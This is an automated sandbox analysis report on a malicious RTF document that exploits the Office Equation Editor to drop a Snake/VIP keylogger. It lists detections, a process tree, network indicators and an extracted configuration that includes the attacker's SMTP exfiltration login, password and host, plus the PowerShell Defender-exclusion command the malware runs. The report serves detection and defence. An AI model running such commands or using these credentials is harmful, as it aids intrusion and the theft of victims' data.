Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
na.doc

Overview

General Information

Sample name:na.doc
Analysis ID:1545180
MD5:657e7d38172b5294be8ff81a94efe745
SHA1:e00cce89c60742889474451b7306ac6bd3c80430
SHA256:89054ad8d24c60063c31b9c2deede4c43b6a6a84da9f657b3450a4c2346c03e3
Tags:docuser-abuse_ch
Infos:

Detection

Snake Keylogger, VIP Keylogger
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Initial sample is an obfuscated RTF file
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Suricata IDS alerts for network traffic
Yara detected Snake Keylogger
Yara detected Telegram RAT
Yara detected VIP Keylogger
.NET source code contains potential unpacker
.NET source code references suspicious native API functions
Adds a directory exclusion to Windows Defender
Contains functionality to capture screen (.Net source)
Contains functionality to log keystrokes (.Net Source)
Document exploit detected (process start blacklist hit)
Injects a PE file into a foreign processes
Installs new ROOT certificates
Machine Learning detection for dropped file
Office equation editor drops PE file
Office equation editor establishes network connection
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Sigma detected: Equation Editor Network Connection
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Suspicious Binary In User Directory Spawned From Office Application
Sigma detected: Suspicious Microsoft Office Child Process
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Yara detected Generic Downloader
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Binary contains a suspicious time stamp
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Office Equation Editor has been started
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious DNS Query for IP Lookup Service APIs
Stores large binary data to the registry
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w7x64
  • WINWORD.EXE (PID: 3168 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
    • EQNEDT32.EXE (PID: 3256 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
      • cdlpohayugo39567.exe (PID: 3424 cmdline: "C:\Users\user\AppData\Roaming\cdlpohayugo39567.exe" MD5: 879B4E39A671B826E59EE54A75714CC7)
        • powershell.exe (PID: 3504 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\cdlpohayugo39567.exe" MD5: EB32C070E658937AA9FA9F3AE629B2B8)
        • cdlpohayugo39567.exe (PID: 3512 cmdline: "C:\Users\user\AppData\Roaming\cdlpohayugo39567.exe" MD5: 879B4E39A671B826E59EE54A75714CC7)
    • EQNEDT32.EXE (PID: 3764 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
404 Keylogger, Snake KeyloggerSnake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: VIP Keylogger

{"Exfil Mode": "SMTP", "Email ID": "yugolog@falconcables.info", "Password": "7213575aceACE@@  ", "Host": "185.198.59.26", "Port": "587"}

Threatname: Snake Keylogger

{"Exfil Mode": "SMTP", "Username": "yugolog@falconcables.info", "Password": "7213575aceACE@@  ", "Host": "185.198.59.26", "Port": "587", "Version": "4.4"}

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
na.docINDICATOR_RTF_MalVer_ObjectsDetects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.ditekSHen
  • 0xe64a2:$obj2: \objdata
  • 0xe64bf:$obj3: \objupdate

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000007.00000002.910514133.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
    00000007.00000002.910514133.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
      00000007.00000002.910514133.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
        00000007.00000002.910514133.0000000000402000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
        • 0x2daa0:$a1: get_encryptedPassword
        • 0x2e028:$a2: get_encryptedUsername
        • 0x2d713:$a3: get_timePasswordChanged
        • 0x2d82a:$a4: get_passwordField
        • 0x2dab6:$a5: set_encryptedPassword
        • 0x307d2:$a6: get_passwords
        • 0x30b66:$a7: get_logins
        • 0x307be:$a8: GetOutlookPasswords
        • 0x30177:$a9: StartKeylogger
        • 0x30abf:$a10: KeyLoggerEventArgs
        • 0x30217:$a11: KeyLoggerEventArgsEventHandler
        00000007.00000002.911170867.0000000002531000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
          Click to see the 12 entries

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          7.2.cdlpohayugo39567.exe.400000.0.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            7.2.cdlpohayugo39567.exe.400000.0.unpackJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
              7.2.cdlpohayugo39567.exe.400000.0.unpackJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
                7.2.cdlpohayugo39567.exe.400000.0.unpackJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
                  7.2.cdlpohayugo39567.exe.400000.0.unpackWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
                  • 0x2dca0:$a1: get_encryptedPassword
                  • 0x2e228:$a2: get_encryptedUsername
                  • 0x2d913:$a3: get_timePasswordChanged
                  • 0x2da2a:$a4: get_passwordField
                  • 0x2dcb6:$a5: set_encryptedPassword
                  • 0x309d2:$a6: get_passwords
                  • 0x30d66:$a7: get_logins
                  • 0x309be:$a8: GetOutlookPasswords
                  • 0x30377:$a9: StartKeylogger
                  • 0x30cbf:$a10: KeyLoggerEventArgs
                  • 0x30417:$a11: KeyLoggerEventArgsEventHandler
                  Click to see the 27 entries

                  Sigma Signatures

                  Exploits

                  barindex
                  Sigma detected: EQNEDT32.EXE connecting to internet
                  Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 87.120.84.38, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 3256, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49161
                  Sigma detected: File Dropped By EQNEDT32EXE
                  Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 3256, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\qHbynE8Vgwabsy3[1].exe

                  System Summary

                  barindex
                  Sigma detected: Equation Editor Network Connection
                  Source: Network ConnectionAuthor: Max Altgelt (Nextron Systems): Data: DestinationIp: 192.168.2.22, DestinationIsIpv6: false, DestinationPort: 49161, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 3256, Protocol: tcp, SourceIp: 87.120.84.38, SourceIsIpv6: false, SourcePort: 80
                  Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\cdlpohayugo39567.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\cdlpohayugo39567.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\cdlpohayugo39567.exe", ParentImage: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exe, ParentProcessId: 3424, ParentProcessName: cdlpohayugo39567.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\cdlpohayugo39567.exe", ProcessId: 3504, ProcessName: powershell.exe
                  Sigma detected: Suspicious Binary In User Directory Spawned From Office Application
                  Source: Process startedAuthor: Jason Lynch: Data: Command: "C:\Users\user\AppData\Roaming\cdlpohayugo39567.exe", CommandLine: "C:\Users\user\AppData\Roaming\cdlpohayugo39567.exe", CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exe, NewProcessName: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exe, OriginalFileName: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 3256, ParentProcessName: EQNEDT32.EXE, ProcessCommandLine: "C:\Users\user\AppData\Roaming\cdlpohayugo39567.exe", ProcessId: 3424, ProcessName: cdlpohayugo39567.exe
                  Sigma detected: Suspicious Microsoft Office Child Process
                  Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io: Data: Command: "C:\Users\user\AppData\Roaming\cdlpohayugo39567.exe", CommandLine: "C:\Users\user\AppData\Roaming\cdlpohayugo39567.exe", CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exe, NewProcessName: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exe, OriginalFileName: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 3256, ParentProcessName: EQNEDT32.EXE, ProcessCommandLine: "C:\Users\user\AppData\Roaming\cdlpohayugo39567.exe", ProcessId: 3424, ProcessName: cdlpohayugo39567.exe
                  Sigma detected: Powershell Defender Exclusion
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\cdlpohayugo39567.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\cdlpohayugo39567.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\cdlpohayugo39567.exe", ParentImage: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exe, ParentProcessId: 3424, ParentProcessName: cdlpohayugo39567.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\cdlpohayugo39567.exe", ProcessId: 3504, ProcessName: powershell.exe
                  Sigma detected: Suspicious DNS Query for IP Lookup Service APIs
                  Source: DNS queryAuthor: Brandon George (blog post), Thomas Patzke: Data: Image: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exe, QueryName: checkip.dyndns.org
                  Sigma detected: Modification of IE Registry Settings
                  Source: Registry Key setAuthor: frack113: Data: Details: 46 00 00 00 2A 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 C0 A8 02 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 3256, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings
                  Sigma detected: Non Interactive PowerShell Process Spawned
                  Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\cdlpohayugo39567.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\cdlpohayugo39567.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\cdlpohayugo39567.exe", ParentImage: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exe, ParentProcessId: 3424, ParentProcessName: cdlpohayugo39567.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\cdlpohayugo39567.exe", ProcessId: 3504, ProcessName: powershell.exe
                  Sigma detected: Office Macro File Creation
                  Source: File createdAuthor: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ProcessId: 3168, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
                  Sigma detected: PowerShell Script Dropped Via PowerShell.EXE
                  Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3504, TargetFilename: C:\Users\user\AppData\Local\Temp\rt4c5fsc.rny.ps1

                  Suricata Signatures

                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-10-30T08:19:41.177030+010020220501A Network Trojan was detected87.120.84.3880192.168.2.2249161TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-10-30T08:19:41.359672+010020220511A Network Trojan was detected87.120.84.3880192.168.2.2249161TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-10-30T08:19:50.707109+010028033053Unknown Traffic192.168.2.2249164188.114.96.3443TCP
                  2024-10-30T08:19:55.083249+010028033053Unknown Traffic192.168.2.2249168188.114.97.3443TCP
                  2024-10-30T08:19:56.949439+010028033053Unknown Traffic192.168.2.2249170188.114.97.3443TCP
                  2024-10-30T08:19:58.455619+010028033053Unknown Traffic192.168.2.2249172188.114.96.3443TCP
                  2024-10-30T08:20:15.045474+010028033053Unknown Traffic192.168.2.2249179188.114.96.3443TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-10-30T08:19:47.874537+010028032742Potentially Bad Traffic192.168.2.2249162132.226.8.16980TCP
                  2024-10-30T08:19:50.122483+010028032742Potentially Bad Traffic192.168.2.2249162132.226.8.16980TCP
                  2024-10-30T08:19:52.660592+010028032742Potentially Bad Traffic192.168.2.2249165132.226.8.16980TCP
                  2024-10-30T08:19:54.501299+010028032742Potentially Bad Traffic192.168.2.2249167132.226.8.16980TCP

                  Joe Sandbox Signatures

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Antivirus / Scanner detection for submitted sample
                  Source: na.docAvira: detected
                  Found malware configuration
                  Source: 00000007.00000002.911170867.0000000002531000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "yugolog@falconcables.info", "Password": "7213575aceACE@@ ", "Host": "185.198.59.26", "Port": "587", "Version": "4.4"}
                  Source: 5.2.cdlpohayugo39567.exe.3ed9e08.5.unpackMalware Configuration Extractor: VIP Keylogger {"Exfil Mode": "SMTP", "Email ID": "yugolog@falconcables.info", "Password": "7213575aceACE@@ ", "Host": "185.198.59.26", "Port": "587"}
                  Multi AV Scanner detection for dropped file
                  Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\qHbynE8Vgwabsy3[1].exeReversingLabs: Detection: 66%
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeReversingLabs: Detection: 66%
                  Multi AV Scanner detection for submitted file
                  Source: na.docReversingLabs: Detection: 44%
                  Machine Learning detection for dropped file
                  Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\qHbynE8Vgwabsy3[1].exeJoe Sandbox ML: detected
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeJoe Sandbox ML: detected

                  Location Tracking

                  barindex
                  Tries to detect the country of the analysis system (by using the IP)
                  Source: unknownDNS query: name: reallyfreegeoip.org

                  Exploits

                  barindex
                  Office equation editor establishes network connection
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXENetwork connect: IP: 87.120.84.38 Port: 80Jump to behavior
                  Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exe
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                  Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.22:49163 version: TLS 1.0
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.22:49180 version: TLS 1.2
                  Source: Binary string: vqar.pdb source: EQNEDT32.EXE, 00000002.00000003.403025619.000000000063D000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.403029344.0000000000621000.00000004.00000020.00020000.00000000.sdmp, cdlpohayugo39567.exe, 00000005.00000000.402963037.0000000000E82000.00000020.00000001.01000000.00000004.sdmp, qHbynE8Vgwabsy3[1].exe.2.dr, cdlpohayugo39567.exe.2.dr
                  Source: Binary string: vqar.pdbSHA256 source: EQNEDT32.EXE, 00000002.00000003.403025619.000000000063D000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.403029344.0000000000621000.00000004.00000020.00020000.00000000.sdmp, cdlpohayugo39567.exe, 00000005.00000000.402963037.0000000000E82000.00000020.00000001.01000000.00000004.sdmp, qHbynE8Vgwabsy3[1].exe.2.dr, cdlpohayugo39567.exe.2.dr

                  Software Vulnerabilities

                  barindex
                  Document exploit detected (process start blacklist hit)
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 4x nop then jmp 001592F9h7_2_0015903A
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 4x nop then jmp 001573EDh7_2_00157200
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 4x nop then jmp 00157D77h7_2_00157200
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 4x nop then jmp 001598BBh7_2_001594A8
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h7_2_00156728
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 4x nop then jmp 0015ED01h7_2_0015EA20
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 4x nop then jmp 0015F631h7_2_0015F351
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h7_2_00156D5A
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 4x nop then jmp 0015F199h7_2_0015EEB8
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h7_2_00156F39
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 4x nop then jmp 0015FAC9h7_2_0015F7E8
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 4x nop then jmp 001598BBh7_2_001597EA
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 4x nop then jmp 006B8A42h7_2_006B8748
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 4x nop then jmp 006B2339h7_2_006B2068
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 4x nop then jmp 006B9D62h7_2_006B9A68
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 4x nop then jmp 006B3A31h7_2_006B3760
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 4x nop then jmp 006B6349h7_2_006B6078
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 4x nop then jmp 006BF372h7_2_006BF078
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 4x nop then jmp 006B0C41h7_2_006B0970
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 4x nop then jmp 006B7A41h7_2_006B7770
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 4x nop then jmp 006BC86Ah7_2_006BC570
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 4x nop then jmp 006B5A19h7_2_006B5748
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 4x nop then jmp 006B0311h7_2_006B0040
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 4x nop then jmp 006B7111h7_2_006B6E40
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 4x nop then jmp 006BF83Ah7_2_006BF540
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 4x nop then jmp 006BE052h7_2_006BDD58
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 4x nop then jmp 006B4321h7_2_006B4050
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 4x nop then jmp 006BB54Ah7_2_006BB250
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 4x nop then jmp 006BE51Ah7_2_006BE220
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 4x nop then jmp 006B1A09h7_2_006B1738
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 4x nop then jmp 006BCD32h7_2_006BCA38
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 4x nop then jmp 006B3101h7_2_006B2E30
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 4x nop then jmp 006BA22Ah7_2_006B9F30
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 4x nop then jmp 006B10D9h7_2_006B0E08
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 4x nop then jmp 006B7ED9h7_2_006B7C08
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 4x nop then jmp 006BFD02h7_2_006BFA08
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 4x nop then jmp 006B27D1h7_2_006B2500
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 4x nop then jmp 006BD1FAh7_2_006BCF00
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 4x nop then jmp 006B50E9h7_2_006B4E18
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 4x nop then jmp 006BBA12h7_2_006BB718
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 4x nop then jmp 006B67E1h7_2_006B6510
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 4x nop then jmp 006B8F0Ah7_2_006B8C10
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 4x nop then jmp 006B47B9h7_2_006B44E8
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 4x nop then jmp 006BE9E2h7_2_006BE6E8
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 4x nop then jmp 006B5EB1h7_2_006B5BE0
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 4x nop then jmp 006BBEDAh7_2_006BBBE0
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 4x nop then jmp 006B3EA1h7_2_006B3BF8
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 4x nop then jmp 006BA6F2h7_2_006BA3F8
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 4x nop then jmp 006B3599h7_2_006B32C8
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 4x nop then jmp 006BD6C2h7_2_006BD3C8
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 4x nop then jmp 006BABBAh7_2_006BA8C0
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 4x nop then jmp 006B07A9h7_2_006B04D8
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 4x nop then jmp 006B75A9h7_2_006B72D8
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 4x nop then jmp 006B93D2h7_2_006B90D8
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 4x nop then jmp 006B1EA1h7_2_006B1BD0
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 4x nop then jmp 006B6C7Ah7_2_006B69A8
